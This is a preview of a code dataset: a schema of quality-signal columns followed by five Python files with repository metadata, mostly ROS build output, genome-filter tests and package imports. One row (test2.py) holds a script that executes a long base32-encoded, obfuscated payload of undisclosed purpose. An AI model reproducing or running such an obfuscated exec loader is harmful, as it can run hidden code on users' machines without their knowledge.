Each row in the preview carries the following columns:

| Column | Type |
|---|---|
| hexsha | string |
| size | int64 |
| ext | string |
| lang | string |
| max_stars_repo_path | string |
| max_stars_repo_name | string |
| max_stars_repo_head_hexsha | string |
| max_stars_repo_licenses | list |
| max_stars_count | int64 |
| max_stars_repo_stars_event_min_datetime | string |
| max_stars_repo_stars_event_max_datetime | string |
| max_issues_repo_path | string |
| max_issues_repo_name | string |
| max_issues_repo_head_hexsha | string |
| max_issues_repo_licenses | list |
| max_issues_count | int64 |
| max_issues_repo_issues_event_min_datetime | string |
| max_issues_repo_issues_event_max_datetime | string |
| max_forks_repo_path | string |
| max_forks_repo_name | string |
| max_forks_repo_head_hexsha | string |
| max_forks_repo_licenses | list |
| max_forks_count | int64 |
| max_forks_repo_forks_event_min_datetime | string |
| max_forks_repo_forks_event_max_datetime | string |
| content | string |
| avg_line_length | float64 |
| max_line_length | int64 |
| alphanum_fraction | float64 |
| effective | string |
| hits | int64 |

Each quality signal then appears as a pair of columns: `<signal>_quality_signal` holds the measured value, and the bare `<signal>` column holds 0, 1, or null in the rows shown. In the rows shown, `hits` equals the number of bare signal columns set to 1.

| Signal | `*_quality_signal` type | Bare-column type |
|---|---|---|
| qsc_code_num_words | int64 | int64 |
| qsc_code_num_chars | float64 | int64 |
| qsc_code_mean_word_length | float64 | int64 |
| qsc_code_frac_words_unique | float64 | null |
| qsc_code_frac_chars_top_2grams | float64 | int64 |
| qsc_code_frac_chars_top_3grams | float64 | int64 |
| qsc_code_frac_chars_top_4grams | float64 | int64 |
| qsc_code_frac_chars_dupe_5grams | float64 | int64 |
| qsc_code_frac_chars_dupe_6grams | float64 | int64 |
| qsc_code_frac_chars_dupe_7grams | float64 | int64 |
| qsc_code_frac_chars_dupe_8grams | float64 | int64 |
| qsc_code_frac_chars_dupe_9grams | float64 | int64 |
| qsc_code_frac_chars_dupe_10grams | float64 | int64 |
| qsc_code_frac_chars_replacement_symbols | float64 | int64 |
| qsc_code_frac_chars_digital | float64 | int64 |
| qsc_code_frac_chars_whitespace | float64 | int64 |
| qsc_code_size_file_byte | float64 | int64 |
| qsc_code_num_lines | float64 | int64 |
| qsc_code_num_chars_line_max | float64 | int64 |
| qsc_code_num_chars_line_mean | float64 | int64 |
| qsc_code_frac_chars_alphabet | float64 | int64 |
| qsc_code_frac_chars_comments | float64 | int64 |
| qsc_code_cate_xml_start | float64 | int64 |
| qsc_code_frac_lines_dupe_lines | float64 | int64 |
| qsc_code_cate_autogen | float64 | int64 |
| qsc_code_frac_lines_long_string | float64 | int64 |
| qsc_code_frac_chars_string_length | float64 | int64 |
| qsc_code_frac_chars_long_word_length | float64 | int64 |
| qsc_code_frac_lines_string_concat | float64 | null |
| qsc_code_cate_encoded_data | float64 | int64 |
| qsc_code_frac_chars_hex_words | float64 | int64 |
| qsc_code_frac_lines_prompt_comments | float64 | int64 |
| qsc_code_frac_lines_assert | float64 | int64 |
| qsc_codepython_cate_ast | float64 | int64 |
| qsc_codepython_frac_lines_func_ratio | float64 | int64 |
| qsc_codepython_cate_var_zero | bool | int64 |
| qsc_codepython_frac_lines_pass | float64 | int64 |
| qsc_codepython_frac_lines_import | float64 | int64 |
| qsc_codepython_frac_lines_simplefunc | float64 | int64 |
| qsc_codepython_score_lines_no_logic | float64 | int64 |
| qsc_codepython_frac_lines_print | float64 | int64 |
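Rows with this schema can be loaded and filtered programmatically. Below is a minimal sketch, assuming the rows are stored in a Parquet shard readable with pandas; the file name `data.parquet` and the filter thresholds are illustrative assumptions, not part of the dataset:

```python
import pandas as pd

# Load one shard of the dataset (file name is hypothetical).
df = pd.read_parquet("data.parquet")

# The *_quality_signal columns hold measured values; the bare columns
# hold per-signal 0/1/null outcomes, and `hits` counts the 1s.
signal_cols = [c for c in df.columns if c.endswith("_quality_signal")]
print(f"{len(signal_cols)} quality-signal columns")

# Example: keep Python files that are not flagged as auto-generated and
# whose mean line length is modest (the threshold is illustrative).
kept = df[
    (df["lang"] == "Python")
    & (df["qsc_code_cate_autogen_quality_signal"] == 0)
    & (df["qsc_code_num_chars_line_mean_quality_signal"] < 100)
]
print(f"kept {len(kept)} of {len(df)} rows")
```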
**Row 1**

| Field | Value |
|---|---|
| hexsha | `de3f38e7858aba5ac689551ca4e85ac0e9e733db` |
| size | 1,664 |
| ext | py |
| lang | Python |
| avg_line_length | 138.666667 |
| max_line_length | 741 |
| alphanum_fraction | 0.836538 |
| effective | 0 |
| hits | 7 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py | filesmuggler/ur3e-ird435-rg2 | 93d5bd72aa35ae5fd104c9e6021d7537e1739772 | ["MIT"] | 1 | 2021-04-01T09:54:30.000Z | 2021-04-01T09:54:30.000Z |
| max_issues | catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py | filesmuggler/ur3e-ird435-rg2 | 93d5bd72aa35ae5fd104c9e6021d7537e1739772 | ["MIT"] | 1 | 2020-09-30T03:58:47.000Z | 2020-09-30T03:58:47.000Z |
| max_forks | catkin_ws/build/fmauch_universal_robot/ur_msgs/cmake/ur_msgs-genmsg-context.py | filesmuggler/ur3e-ird435-rg2 | 93d5bd72aa35ae5fd104c9e6021d7537e1739772 | ["MIT"] | null | null | null |

`content`:

```python
# generated from genmsg/cmake/pkg-genmsg.context.in
messages_str = "/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/Analog.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/Digital.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/IOStates.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/RobotStateRTMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/MasterboardDataMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/RobotModeDataMsg.msg;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg/ToolDataMsg.msg"
services_str = "/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetPayload.srv;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetSpeedSliderFraction.srv;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/srv/SetIO.srv"
pkg_name = "ur_msgs"
dependencies_str = "std_msgs;geometry_msgs"
langs = "gencpp;geneus;genlisp;gennodejs;genpy"
dep_include_paths_str = "ur_msgs;/home/krzysztof/Repos/ur3e-ird435-rg2/catkin_ws/src/fmauch_universal_robot/ur_msgs/msg;std_msgs;/opt/ros/melodic/share/std_msgs/cmake/../msg;geometry_msgs;/opt/ros/melodic/share/geometry_msgs/cmake/../msg"
PYTHON_EXECUTABLE = "/usr/bin/python2"
package_has_static_sources = '' == 'TRUE'
genmsg_check_deps_script = "/opt/ros/melodic/share/genmsg/cmake/../../../lib/genmsg/genmsg_check_deps.py"
```

Quality signals (measured value | bare-column value):

| Signal | Value | Bare |
|---|---|---|
| qsc_code_num_words | 265 | 0 |
| qsc_code_num_chars | 1,664 | 0 |
| qsc_code_mean_word_length | 4.996226 | 0 |
| qsc_code_frac_words_unique | 0.256604 | null |
| qsc_code_frac_chars_top_2grams | 0.058912 | 0 |
| qsc_code_frac_chars_top_3grams | 0.149547 | 0 |
| qsc_code_frac_chars_top_4grams | 0.182779 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.64577 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.612538 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0.612538 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0.612538 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0.612538 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0.612538 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.034356 | 0 |
| qsc_code_frac_chars_whitespace | 0.020433 | 0 |
| qsc_code_size_file_byte | 1,664 | 0 |
| qsc_code_num_lines | 11 | 0 |
| qsc_code_num_chars_line_max | 742 | 0 |
| qsc_code_num_chars_line_mean | 151.272727 | 1 |
| qsc_code_frac_chars_alphabet | 0.777914 | 0 |
| qsc_code_frac_chars_comments | 0.029447 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 1 | 1 |
| qsc_code_frac_lines_long_string | 0.333333 | 1 |
| qsc_code_frac_chars_string_length | 0.874148 | 1 |
| qsc_code_frac_chars_long_word_length | 0.857409 | 1 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
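Row 1 is a catkin build artifact whose first line reads `# generated from genmsg/cmake/pkg-genmsg.context.in`, and its `qsc_code_cate_autogen` signal is 1. A minimal sketch of how such a detector could work follows; the marker list and the head-of-file window are illustrative assumptions, not the dataset's actual implementation:

```python
import re

# Hypothetical markers commonly found near the top of generated files.
AUTOGEN_MARKERS = re.compile(
    r"generated from|auto-?generated|do not edit", re.IGNORECASE
)

def looks_autogenerated(content: str, head_lines: int = 5) -> bool:
    """Return True if an autogen marker appears near the top of the file."""
    head = "\n".join(content.splitlines()[:head_lines])
    return bool(AUTOGEN_MARKERS.search(head))

# Row 1's content starts with a genmsg marker, so it matches.
assert looks_autogenerated(
    "# generated from genmsg/cmake/pkg-genmsg.context.in\npkg_name = 'ur_msgs'"
)
```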
**Row 2**

| Field | Value |
|---|---|
| hexsha | `721be945a415b79e762b1abd4c14b160a98487a4` |
| size | 3,193 |
| ext | py |
| lang | Python |
| avg_line_length | 42.013158 |
| max_line_length | 78 |
| alphanum_fraction | 0.554338 |
| effective | 0 |
| hits | 7 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | genome_sampler/tests/test_filter.py | Oddant1/genome-sampler | eccaa591388ab98fad8a657b868fad75996eaa8c | ["BSD-3-Clause"] | 4 | 2020-07-04T21:39:32.000Z | 2022-03-18T11:08:48.000Z |
| max_issues | genome_sampler/tests/test_filter.py | Oddant1/genome-sampler | eccaa591388ab98fad8a657b868fad75996eaa8c | ["BSD-3-Clause"] | 57 | 2020-05-28T18:26:37.000Z | 2021-03-11T22:12:16.000Z |
| max_forks | genome_sampler/tests/test_filter.py | Oddant1/genome-sampler | eccaa591388ab98fad8a657b868fad75996eaa8c | ["BSD-3-Clause"] | 6 | 2020-05-28T22:28:52.000Z | 2022-01-24T14:53:16.000Z |

`content`:

```python
import skbio
import pandas as pd

from qiime2.plugin.testing import TestPluginBase

from ..filter import filter_seqs


class FilterTests(TestPluginBase):
    package = 'genome_sampler.tests'

    def test_no_filter(self):
        exp = pd.Series({'s1': skbio.DNA('ACGTTNGACA', metadata={'id': 's1'}),
                         's2': skbio.DNA('A', metadata={'id': 's2'}),
                         's3': skbio.DNA('NNNNNN', metadata={'id': 's3'})})
        obs = filter_seqs(exp)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_too_short(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
                         's2': skbio.DNA('AA', metadata={'id': 's2'})})
        exp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'})})
        obs = filter_seqs(inp, min_length=3)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_too_long(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
                         's2': skbio.DNA('AA', metadata={'id': 's2'})})
        exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
        obs = filter_seqs(inp, max_length=3)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_too_ambiguous(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACANNNN',
                                         metadata={'id': 's1'}),
                         's2': skbio.DNA('AA', metadata={'id': 's2'})})
        exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
        obs = filter_seqs(inp, max_proportion_ambiguous=.3)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_too_long_and_too_ambiguous(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACANNNN',
                                         metadata={'id': 's1'}),
                         's2': skbio.DNA('AA', metadata={'id': 's2'})})
        exp = pd.Series({'s2': skbio.DNA('AA', metadata={'id': 's2'})})
        obs = filter_seqs(inp, max_proportion_ambiguous=.3, max_length=5)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_too_short_and_too_ambiguous(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
                         's2': skbio.DNA('AAN', metadata={'id': 's2'})})
        exp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'})})
        obs = filter_seqs(inp, max_proportion_ambiguous=.3, min_length=4)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))

    def test_empty_return(self):
        inp = pd.Series({'s1': skbio.DNA('ACGTTGACA', metadata={'id': 's1'}),
                         's2': skbio.DNA('AAN', metadata={'id': 's2'})})
        exp = pd.Series()
        obs = filter_seqs(inp, min_length=29000)
        self.assertEqual(list(obs.index), list(exp.index))
        self.assertEqual(list(obs), list(exp))
```

Quality signals (measured value | bare-column value):

| Signal | Value | Bare |
|---|---|---|
| qsc_code_num_words | 397 | 0 |
| qsc_code_num_chars | 3,193 | 0 |
| qsc_code_mean_word_length | 4.357683 | 0 |
| qsc_code_frac_words_unique | 0.143577 | null |
| qsc_code_frac_chars_top_2grams | 0.092486 | 0 |
| qsc_code_frac_chars_top_3grams | 0.153757 | 0 |
| qsc_code_frac_chars_top_4grams | 0.178035 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.842197 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.842197 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0.801156 | 1 |
| qsc_code_frac_chars_dupe_8grams | 0.801156 | 1 |
| qsc_code_frac_chars_dupe_9grams | 0.787861 | 1 |
| qsc_code_frac_chars_dupe_10grams | 0.787861 | 1 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.022157 | 0 |
| qsc_code_frac_chars_whitespace | 0.250861 | 0 |
| qsc_code_size_file_byte | 3,193 | 0 |
| qsc_code_num_lines | 75 | 0 |
| qsc_code_num_chars_line_max | 79 | 0 |
| qsc_code_num_chars_line_mean | 42.573333 | 0 |
| qsc_code_frac_chars_alphabet | 0.701087 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0.578947 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.080489 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0.245614 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0.122807 | 0 |
| qsc_codepython_cate_var_zero | false | 0 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.070175 | 0 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.22807 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
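Row 2's `qsc_code_frac_lines_assert` value can be checked by hand: 14 of the 57 non-blank content lines are `self.assertEqual` calls, and 14/57 ≈ 0.245614 matches the reported value. The sketch below reproduces that arithmetic; the exact line definition used by the pipeline is an assumption:

```python
# Hand check of a frac-of-lines signal: count assert-style lines over
# non-blank lines (whether the pipeline ignores blank lines is assumed).
def frac_lines_assert(content: str) -> float:
    lines = [ln.strip() for ln in content.splitlines() if ln.strip()]
    hits = sum(ln.startswith(("assert", "self.assert")) for ln in lines)
    return hits / len(lines) if lines else 0.0

print(frac_lines_assert("x = 1\nself.assertEqual(x, 1)"))  # 0.5
```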
**Row 3**

| Field | Value |
|---|---|
| hexsha | `721c2626a696f6e9843e7fb60b2e703b3731220b` |
| size | 554 |
| ext | py |
| lang | Python |
| avg_line_length | 184.666667 |
| max_line_length | 530 |
| alphanum_fraction | 0.978339 |
| effective | 0 |
| hits | 9 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | test2.py | Err0r-ICA/VAROUS | 63326403ded1f2c3394041f9f2392c2e25f971e5 | ["MIT"] | 46 | 2020-04-28T13:15:50.000Z | 2022-03-30T18:20:00.000Z |
| max_issues | test2.py | Err0r-ICA/VAROUS | 63326403ded1f2c3394041f9f2392c2e25f971e5 | ["MIT"] | 3 | 2020-06-15T21:30:36.000Z | 2021-08-20T13:37:07.000Z |
| max_forks | test2.py | Err0r-ICA/VAROUS | 63326403ded1f2c3394041f9f2392c2e25f971e5 | ["MIT"] | 13 | 2020-04-28T10:19:54.000Z | 2022-02-22T19:06:51.000Z |

`content`:

```python
import marshal, base64
exec(base64.b32decode("MZZG63JAORUHEZLBMRUW4ZZANFWXA33SOQQFI2DSMVQWICQKNFWXA33SOQQHOYLSNZQQUZTSN5WSA53BOJXGCIDJNVYG64TUEBYGK3DBNZTWSCQKNFWXA33SOQQHI2LNMUFAU5BRHVKGQ4TFMFSCQ5DBOJTWK5B5OBSWYYLOM5USYIDBOJTXGPJIEJGE6QKEJFHEOIRMJZXW4ZJMGIUSSCTUGEXHG5DBOJ2CQKIKBJSGKZRAMRXSQKJ2BIQCAIBAEAQCAIDJNVYG64TUEB3WC4TOMEWHEZLROVSXG5DTBIQCAIBAEAQCAIDSHVZGK4LVMVZXI4ZOM5SXIKBHNB2HI4DTHIXS63TVOVRGSLTIMVZG623VMFYHALTDN5WSOKJAENSG6IDTN5WWK5DINFXGOCRAEAQCAIBAEAQHOYLSNZQS443UN5YD2VDSOVSQUIBAEAQCAIBAEBZGK5DVOJXCA4QKOJ2W4PLEN4UCSCTQOJUW45BIOJ2W4KIK"))
```

Quality signals (measured value | bare-column value):

| Signal | Value | Bare |
|---|---|---|
| qsc_code_num_words | 7 | 1 |
| qsc_code_num_chars | 554 | 0 |
| qsc_code_mean_word_length | 77.428571 | 1 |
| qsc_code_frac_words_unique | 0.857143 | null |
| qsc_code_frac_chars_top_2grams | 0 | 0 |
| qsc_code_frac_chars_top_3grams | 0 | 0 |
| qsc_code_frac_chars_top_4grams | 0 | 0 |
| qsc_code_frac_chars_dupe_5grams | 0 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0.121818 | 0 |
| qsc_code_frac_chars_whitespace | 0.00722 | 0 |
| qsc_code_size_file_byte | 554 | 0 |
| qsc_code_num_lines | 2 | 1 |
| qsc_code_num_chars_line_max | 531 | 0 |
| qsc_code_num_chars_line_mean | 277 | 1 |
| qsc_code_frac_chars_alphabet | 0.863636 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0.909747 | 1 |
| qsc_code_frac_chars_long_word_length | 0.909747 | 1 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 1 | 1 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 0.5 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 0.5 | 0 |
| qsc_codepython_frac_lines_print | 0 | 0 |
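Row 3 is a two-line obfuscated script whose entire payload is one base32 blob passed to `exec`, and its `qsc_code_cate_encoded_data` signal is 1. A minimal sketch of detecting such blobs follows; the regex and the 64-character threshold are illustrative assumptions, not the dataset's actual rule. To inspect a payload like this one, decode it with `base64.b32decode` and read the result; never `exec` it:

```python
import re

# Long runs of base32 ([A-Z2-7=]) or base64 ([A-Za-z0-9+/=]) characters
# are a strong hint of embedded encoded data (threshold is an assumption).
ENCODED_BLOB = re.compile(r"[A-Z2-7=]{64,}|[A-Za-z0-9+/=]{64,}")

def has_encoded_data(content: str) -> bool:
    return bool(ENCODED_BLOB.search(content))

print(has_encoded_data("x = 1"))            # False
print(has_encoded_data("s = '" + "MZZG63JA" * 10 + "'"))  # True
```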
**Row 4**

| Field | Value |
|---|---|
| hexsha | `a0c62c363cd939767786da26f6dfe3ba8ccf3324` |
| size | 276 |
| ext | py |
| lang | Python |
| avg_line_length | 39.428571 |
| max_line_length | 60 |
| alphanum_fraction | 0.891304 |
| effective | 0 |
| hits | 7 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | openproblems/tasks/label_projection/methods/__init__.py | bendemeo/SingleCellOpenProblems | e4c009f8c232bdae4c9e20b8e435d0fe474b3daf | ["MIT"] | 134 | 2020-08-19T07:35:56.000Z | 2021-05-19T11:37:50.000Z |
| max_issues | openproblems/tasks/label_projection/methods/__init__.py | bendemeo/SingleCellOpenProblems | e4c009f8c232bdae4c9e20b8e435d0fe474b3daf | ["MIT"] | 175 | 2020-08-17T15:26:06.000Z | 2021-05-14T11:03:46.000Z |
| max_forks | openproblems/tasks/label_projection/methods/__init__.py | LuckyMD/SingleCellOpenProblems | 0ae39db494557e1dd9f28e59dda765527191eee1 | ["MIT"] | 46 | 2020-10-08T21:11:37.000Z | 2021-04-25T07:05:28.000Z |

`content`:

```python
from .knn_classifier import knn_classifier_log_cpm
from .knn_classifier import knn_classifier_scran
from .logistic_regression import logistic_regression_log_cpm
from .logistic_regression import logistic_regression_scran
from .mlp import mlp_log_cpm
from .mlp import mlp_scran
```

Quality signals (measured value | bare-column value):

| Signal | Value | Bare |
|---|---|---|
| qsc_code_num_words | 41 | 0 |
| qsc_code_num_chars | 276 | 0 |
| qsc_code_mean_word_length | 5.585366 | 0 |
| qsc_code_frac_words_unique | 0.243902 | null |
| qsc_code_frac_chars_top_2grams | 0.227074 | 1 |
| qsc_code_frac_chars_top_3grams | 0.131004 | 0 |
| qsc_code_frac_chars_top_4grams | 0.200873 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.716157 | 0 |
| qsc_code_frac_chars_dupe_6grams | 0.716157 | 1 |
| qsc_code_frac_chars_dupe_7grams | 0 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.086957 | 0 |
| qsc_code_size_file_byte | 276 | 0 |
| qsc_code_num_lines | 6 | 1 |
| qsc_code_num_chars_line_max | 61 | 0 |
| qsc_code_num_chars_line_mean | 46 | 0 |
| qsc_code_frac_chars_alphabet | 0.90873 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
| qsc_code_cate_autogen | 0 | 0 |
| qsc_code_frac_lines_long_string | 0 | 0 |
| qsc_code_frac_chars_string_length | 0 | 0 |
| qsc_code_frac_chars_long_word_length | 0 | 0 |
| qsc_code_frac_lines_string_concat | 0 | null |
| qsc_code_cate_encoded_data | 0 | 0 |
| qsc_code_frac_chars_hex_words | 0 | 0 |
| qsc_code_frac_lines_prompt_comments | 0 | 0 |
| qsc_code_frac_lines_assert | 0 | 0 |
| qsc_codepython_cate_ast | 1 | 0 |
| qsc_codepython_frac_lines_func_ratio | 0 | 0 |
| qsc_codepython_cate_var_zero | true | 1 |
| qsc_codepython_frac_lines_pass | 0 | 0 |
| qsc_codepython_frac_lines_import | 1 | 1 |
| qsc_codepython_frac_lines_simplefunc | 0 | 0 |
| qsc_codepython_score_lines_no_logic | 1 | 1 |
| qsc_codepython_frac_lines_print | 0 | 0 |
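Row 4 is a re-export `__init__.py` whose six lines are all `from ... import ...` statements, and both `qsc_codepython_frac_lines_import` and `qsc_codepython_score_lines_no_logic` report 1. A sketch of an AST-based import-fraction signal follows; whether the pipeline counts statements or physical lines is an assumption:

```python
import ast

def frac_lines_import(source: str) -> float:
    """Fraction of non-blank lines that are top-level import statements.

    Approximation: multi-line statements are counted once via the AST,
    while the denominator counts physical non-blank lines.
    """
    tree = ast.parse(source)
    lines = [ln for ln in source.splitlines() if ln.strip()]
    imports = sum(isinstance(node, (ast.Import, ast.ImportFrom))
                  for node in tree.body)
    return imports / len(lines) if lines else 0.0

src = "from .mlp import mlp_log_cpm\nfrom .mlp import mlp_scran\n"
print(frac_lines_import(src))  # 1.0, as reported for this row
```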
**Row 5**

| Field | Value |
|---|---|
| hexsha | `a0cc82e8ef16ebb9284f7f67457841edfdc6e731` |
| size | 177 |
| ext | py |
| lang | Python |
| avg_line_length | 29.5 |
| max_line_length | 63 |
| alphanum_fraction | 0.881356 |
| effective | 0 |
| hits | 7 |

| View | Repo path | Repo name | Head hexsha | Licenses | Count | First event | Last event |
|---|---|---|---|---|---|---|---|
| max_stars | datalad_crawler/pipelines/tests/__init__.py | CONP-PCNO/datalad-crawler | 888e179f73dc000103b183e0bb5e47c4aea31ead | ["MIT"] | 5 | 2018-09-20T07:15:45.000Z | 2020-04-12T15:01:58.000Z |
| max_issues | datalad_crawler/pipelines/tests/__init__.py | CONP-PCNO/datalad-crawler | 888e179f73dc000103b183e0bb5e47c4aea31ead | ["MIT"] | 107 | 2018-05-08T13:09:14.000Z | 2022-02-23T18:40:58.000Z |
| max_forks | datalad_crawler/pipelines/tests/__init__.py | CONP-PCNO/datalad-crawler | 888e179f73dc000103b183e0bb5e47c4aea31ead | ["MIT"] | 9 | 2018-05-16T00:35:02.000Z | 2021-10-01T18:38:17.000Z |

`content`:

```python
from datalad.tests.utils import skip_if_no_module
skip_if_no_module('scrapy')
from datalad.tests.utils import skip_if_scrapy_without_selector
skip_if_scrapy_without_selector()
```

Quality signals (measured value | bare-column value):

| Signal | Value | Bare |
|---|---|---|
| qsc_code_num_words | 29 | 1 |
| qsc_code_num_chars | 177 | 0 |
| qsc_code_mean_word_length | 4.896552 | 0 |
| qsc_code_frac_words_unique | 0.413793 | null |
| qsc_code_frac_chars_top_2grams | 0.169014 | 0 |
| qsc_code_frac_chars_top_3grams | 0.225352 | 1 |
| qsc_code_frac_chars_top_4grams | 0.295775 | 1 |
| qsc_code_frac_chars_dupe_5grams | 0.802817 | 1 |
| qsc_code_frac_chars_dupe_6grams | 0.464789 | 0 |
| qsc_code_frac_chars_dupe_7grams | 0.464789 | 0 |
| qsc_code_frac_chars_dupe_8grams | 0 | 0 |
| qsc_code_frac_chars_dupe_9grams | 0 | 0 |
| qsc_code_frac_chars_dupe_10grams | 0 | 0 |
| qsc_code_frac_chars_replacement_symbols | 0 | 0 |
| qsc_code_frac_chars_digital | 0 | 0 |
| qsc_code_frac_chars_whitespace | 0.062147 | 0 |
| qsc_code_size_file_byte | 177 | 0 |
| qsc_code_num_lines | 5 | 1 |
| qsc_code_num_chars_line_max | 64 | 0 |
| qsc_code_num_chars_line_mean | 35.4 | 0 |
| qsc_code_frac_chars_alphabet | 0.855422 | 0 |
| qsc_code_frac_chars_comments | 0 | 0 |
| qsc_code_cate_xml_start | 0 | 0 |
| qsc_code_frac_lines_dupe_lines | 0 | 0 |
